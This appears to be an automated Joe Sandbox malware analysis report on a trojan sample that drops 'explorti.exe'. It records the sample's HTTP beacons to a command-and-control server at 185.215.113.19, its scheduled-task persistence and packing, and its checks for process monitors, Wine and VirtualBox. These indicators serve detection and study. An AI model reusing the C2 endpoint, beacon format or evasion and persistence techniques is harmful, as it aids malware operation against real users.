Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.19 185.215.113.19

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 10_2_002BBD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

10_2_002BBD60

Source: unknown

HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: explorti.exe, 0000000A.00000002.3368400813.0000000001719000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3368400813.0000000001756000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3368400813.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php8
Source: explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpC
Source: explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpN
Source: explorti.exe, 0000000A.00000002.3368400813.000000000170D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpa
Source: explorti.exe, 0000000A.00000002.3368400813.000000000170D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpm32
Source: explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpo
Source: explorti.exe, 0000000A.00000002.3368400813.000000000170D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpr
Source: explorti.exe, 0000000A.00000002.3368400813.0000000001732000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpt

System Summary

PE file contains section with special chars

Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: .idata
Source: setup.exe	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:

Creates files inside the system directory

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Windows\Tasks\explorti.job

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002F3068	10_2_002F3068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002BE440	10_2_002BE440
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002B4CF0	10_2_002B4CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002E7D83	10_2_002E7D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002F765B	10_2_002F765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002B4AF0	10_2_002B4AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002F8720	10_2_002F8720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002F6F09	10_2_002F6F09
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002F777B	10_2_002F777B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002F2BD0	10_2_002F2BD0

Source: setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: setup.exe	Static PE information: Section: ZLIB complexity 0.9998719262295082
Source: setup.exe	Static PE information: Section: rylhmesc ZLIB complexity 0.9945997846699479
Source: explorti.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9998719262295082
Source: explorti.exe.0.dr	Static PE information: Section: rylhmesc ZLIB complexity 0.9945997846699479

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7

Source: C:\Users\user\Desktop\setup.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: setup.exe

ReversingLabs: Detection: 62%

Source: setup.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\setup.exe

File read: C:\Users\user\Desktop\setup.exe

Source: unknown	Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Detected unpacking (changes PE section rights)

Source: setup.exe

Static file information: File size 1971200 > 1048576

Source: setup.exe

Static PE information: Raw size of rylhmesc is bigger than: 0x100000 < 0x1afc00

Data Obfuscation

Source: C:\Users\user\Desktop\setup.exe	Unpacked PE file: 0.2.setup.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 2.2.explorti.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 3.2.explorti.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 10.2.explorti.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rylhmesc:EW;ofvhckac:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: explorti.exe.0.dr	Static PE information: real checksum: 0x1edd2b should be: 0x1ed18b
Source: setup.exe	Static PE information: real checksum: 0x1edd2b should be: 0x1ed18b

PE file contains sections with non-standard names

Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: .idata
Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: rylhmesc
Source: setup.exe	Static PE information: section name: ofvhckac
Source: setup.exe	Static PE information: section name: .taggant
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: rylhmesc
Source: explorti.exe.0.dr	Static PE information: section name: ofvhckac
Source: explorti.exe.0.dr	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 10_2_002CD84C push ecx; ret

10_2_002CD85F

Source: setup.exe	Static PE information: section name: entropy: 7.983148121720557
Source: setup.exe	Static PE information: section name: rylhmesc entropy: 7.952696111098041
Source: explorti.exe.0.dr	Static PE information: section name: entropy: 7.983148121720557
Source: explorti.exe.0.dr	Static PE information: section name: rylhmesc entropy: 7.952696111098041

Drops PE files

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior

Creates job files (autostart)

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Windows\Tasks\explorti.job

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\setup.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

